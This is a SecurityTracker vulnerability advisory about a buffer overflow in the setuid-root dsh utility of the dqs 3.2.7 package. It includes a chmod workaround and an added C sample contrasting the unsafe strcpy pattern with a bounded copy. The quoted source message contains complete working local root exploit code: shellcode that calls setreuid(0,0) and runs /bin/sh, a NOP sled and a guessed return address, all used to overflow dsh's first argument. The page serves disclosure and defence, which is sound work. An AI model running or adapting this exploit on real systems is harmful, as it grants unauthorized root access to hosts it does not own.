SecurityTracker.com
SecurityTracker Archives

Category:   Application (Generic)  >   Dqs (Distributed Queueing System)
Vendors:   Florida State University
DQS Distributed Queueing System Utility for Unix/Linux Allows Local Users to Obtain Root Level Access on the Host
SecurityTracker Alert ID:  1001580
SecurityTracker URL:  http://securitytracker.com/id/1001580
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 19 2001
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): dqs 3.2.7
Description:   The DQS distributed queueing system ships a distributed shell utility (dsh) that contains a buffer overflow exploitable by local users to obtain root-level access on the host.

It is reported that passing an overly long string as the first command line argument to dsh makes the program crash with a SIGSEGV: the argument overruns a fixed-size buffer. Because the utility is installed set-user-ID (setuid) root (mode -rwsr-xr-x in the report), a local user who supplies crafted data in place of the crashing input can execute arbitrary code on the host with root privileges.
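As an added illustration of the bug class (not dsh's source, which is not on this page, and not code from the report's author): a hypothetical fixed-size-buffer copy of the first argument in the unsafe form the description implies, beside a bounded form that rejects oversize input instead of overrunning the buffer. The buffer size TARGET_BUF and the function names are assumptions made for the example; the 2772-byte test input mirrors the BUFFSIZE used by the published exploit.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the fixed local buffer. dsh's real buffer size is not on
 * the page; 256 is an illustrative choice. The published exploit hands dsh a
 * 2772-byte argument, so any buffer smaller than that is overrun by it. */
#define TARGET_BUF 256

/* BEFORE (vulnerable pattern): the first argument is copied into a stack
 * buffer with no length check. A long argument runs past 'target' into the
 * saved frame pointer and return address. In a setuid-root binary that lets
 * a local user redirect execution: garbage gives SIGSEGV, a crafted address
 * gives a root shell. Kept here only as the 'before' form; never call it
 * with untrusted input. */
int run_unsafe(const char *arg)
{
    char target[TARGET_BUF];
    strcpy(target, arg);                 /* unbounded copy: the bug */
    return (int)strlen(target);
}

/* AFTER (hardened): reject, rather than silently truncate, anything that
 * does not fit, and never scan or write beyond outsz bytes.
 * Returns 0 with 'out' filled, or -1 for NULL, empty or oversize input. */
int copy_target(const char *arg, char *out, size_t outsz)
{
    size_t n;
    if (arg == NULL || outsz == 0)
        return -1;
    for (n = 0; n < outsz && arg[n] != '\0'; n++)   /* bounded scan */
        ;
    if (n == 0 || n >= outsz)            /* n == outsz leaves no room for NUL */
        return -1;
    memcpy(out, arg, n);
    out[n] = '\0';
    return 0;
}

/* Same interface as run_unsafe: -1 = rejected, else length accepted. */
int run_safe(const char *arg)
{
    char target[TARGET_BUF];
    if (copy_target(arg, target, sizeof target) != 0)
        return -1;
    return (int)strlen(target);
}

/* Constructed oversize argument of the length the exploit uses, filled
 * with 'A'. Caller frees. */
char *make_long_arg(size_t len)
{
    char *p = malloc(len + 1);
    if (p == NULL)
        return NULL;
    memset(p, 'A', len);
    p[len] = '\0';
    return p;
}

int main(void)
{
    char *big = make_long_arg(2772);
    if (big == NULL)
        return 1;
    printf("short arg:     %d\n", run_safe("node1"));   /* 5 */
    printf("2772-byte arg: %d\n", run_safe(big));       /* -1: rejected */
    /* run_unsafe(big) would smash the stack; deliberately not called. */
    free(big);
    return 0;
}
```

The point of the hardened form is that the bound is the destination's size, checked before any byte is written; truncating with strncpy would avoid the crash but could still hand dsh a different host name than the user typed.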

The author of the report notes that SuSE 6.3, 6.4, and 7.0 all ship dqs 3.2.7 by default and are therefore affected.

Demonstration exploit code is provided in the Source Message.

Impact:   A local user can obtain root level access on the host.
Solution:   No vendor fix was available at the time of this entry. As a workaround, the author of the report suggests removing the set-user-ID (setuid) bit from /usr/bin/dsh (chmod -s /usr/bin/dsh), which confines any overflow to the privileges of the invoking user.
Vendor URL:  packages.debian.org/stable/admin/dqs.html
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  dqs 3.2.7 local root exploit.

Hello.

DESCRIPTION:
I found a buffer overflow vulnerability in /usr/bin/dsh (dqs 3.2.7 package).

I really don't know if this bug was discovered already. If that's right, then sorry =).

If a long line is given as the first argument, the program gives a SIGSEGV signal.

This bug was reported to Drake Diedrich, Maintainer for dqs (Drake.Diedrich@anu.edu.adu).

AFFECTED:
SuSE 6.3, 6.4, 7.0 have dqs 3.2.7 by default and so are vulnerable; maybe others.

FIX:
Remove the SUID permission.
|root@netdex /root|# ls -la /usr/bin/dsh
-rwsr-xr-x    1 root     root       502748 May 18 00:36 /usr/bin/dsh
|root@netdex /root|# chmod -s /usr/bin/dsh
|root@netdex /root|# ls -la /usr/bin/dsh
-rwxr-xr-x    1 root     root       502748 May 18 00:36 /usr/bin/dsh
|root@netdex /root|#

EXAMPLE EXPLOIT:
You can find the exploit at
www.raza-mexicana.org/programas/programas/qsexp.c
And here it is:

----CUT HERE----

/* - dqsexp.c - */
/********************************************************************/
/* /usr/bin/dsh (dqs 3.2.7 package) local root exploit.             */
/* SuSE 6.3, 6.4, and 7.0 are vulnerable.                           */
/* dex@raza-mexicana.org <> http://www.raza-mexicana.org            */
/* Greetings: dr_fdisk^, yield, vlad, deadsector, trovalz, fatal,   */
/* megaflop and all of raza. Too much work to list everyone XD.     */
/* Special greetings to the little Spaniard (NOP) :P, you know why. */
/*                                                                  */
/*        - dex@raza-mexicana.org <> http://www.raza-mexicana.org - */
/********************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFSIZE 2772   /* length of the argument handed to dsh            */
#define OFFSET 0        /* subtracted from %esp to guess the return address */
#define ALIGN 0         /* shifts the shellcode within the buffer           */

/* Read the current stack pointer (Linux/i386 only). The target's stack
 * lies near ours, so this is the base of the return-address guess.     */
unsigned long get_sp(void) {
  unsigned long sp;
  __asm__("movl %%esp, %0" : "=r"(sp));
  return sp;
}

/* Linux/i386 shellcode: setreuid(0,0), then execve("/bin/sh", ...). */
static char code[]=                      /* stolen from mount.c :P   */
  "\x29\xc0"                             /* subl %eax, %eax          */
  "\xb0\x46"                             /* movb $70, %al            */
  "\x29\xdb"                             /* subl %ebx, %ebx          */
  "\xb3\x0c"                             /* movb $12, %bl            */
  "\x80\xeb\x0c"                         /* subb $12, %bl            */
  "\x89\xd9"                             /* movl %ebx, %ecx          */
  "\xcd\x80"                             /* int $0x80                */
  "\xeb\x18"                             /* jmp callz                */
  "\x5e"                                 /* popl %esi                */
  "\x29\xc0"                             /* subl %eax, %eax          */
  "\x88\x46\x07"                         /* movb %al, 0x07(%esi)     */
  "\x89\x46\x0c"                         /* movl %eax, 0x0c(%esi)    */
  "\x89\x76\x08"                         /* movl %esi, 0x08(%esi)    */
  "\xb0\x0b"                             /* movb $0x0b, %al          */
  "\x87\xf3"                             /* xchgl %esi, %ebx         */
  "\x8d\x4b\x08"                         /* leal 0x08(%ebx), %ecx    */
  "\x8d\x53\x0c"                         /* leal 0x0c(%ebx), %edx    */
  "\xcd\x80"                             /* int $0x80                */
  "\xe8\xe3\xff\xff\xff"                 /* call start               */
  "\x2f\x62\x69\x6e\x2f\x73\x68";        /* "/bin/sh"                */


int main(int argc, char **argv) {

  int i;
  unsigned long addr;

  char *buffer;

  int offset=OFFSET;
  int buffsize=BUFFSIZE;
  int align=ALIGN;

  /* usage: dqsexp [offset] [align] [buffsize] */
  if (argc > 1 ) offset = atoi(argv[1]);
  if (argc > 2 ) align = atoi(argv[2]);
  if (argc > 3 ) buffsize = atoi(argv[3]);

  if (buffsize < (int)strlen(code) + align + 8) {
    fprintf(stderr, "buffsize too small for the shellcode\n");
    return 1;
  }

  buffer = (char *)malloc(buffsize + 8);
  if (buffer == NULL) {
    perror("malloc");
    return 1;
  }

  addr = get_sp() - offset;

  /* NOP sled over the whole buffer...                                   */
  for(i = 0; i < buffsize; i += 4) {
    *(long *)&buffer[i] = 0x90909090;
  }

  /* ...the guessed return address in the last two words...              */
  *(long *)&buffer[buffsize - 8] = addr;
  *(long *)&buffer[buffsize - 4] = addr;

  /* ...and the shellcode just below them, shifted by 'align'.           */
  memcpy(buffer + buffsize - 8 - strlen(code) - align, code, strlen(code));
  buffer[buffsize] = '\0';   /* execl() passes the buffer as a C string */

  printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
  printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local root exploit.\n");
  printf("[*] - dex@raza-mexicana.org <> http://www.raza-mexicana.org -\n");
  printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");

  printf("[*] Address=0x%lx, Align=%d, Offset=%d\n", addr, align, offset);

  printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
  printf("[*] Starting....\n");

  /* the oversized first argument overflows dsh's buffer */
  execl("/usr/bin/dsh", "dsh", buffer, "/etc/motd", (char *)NULL);
  perror("execl");   /* only reached if dsh could not be executed */
  free(buffer);
  return 1;
}

----EOF----

=================================================
Mail: dex@raza-mexicana.org
Page: http://www.raza-mexicana.org
===============================================


Copyright 2021, SecurityGlobal.net LLC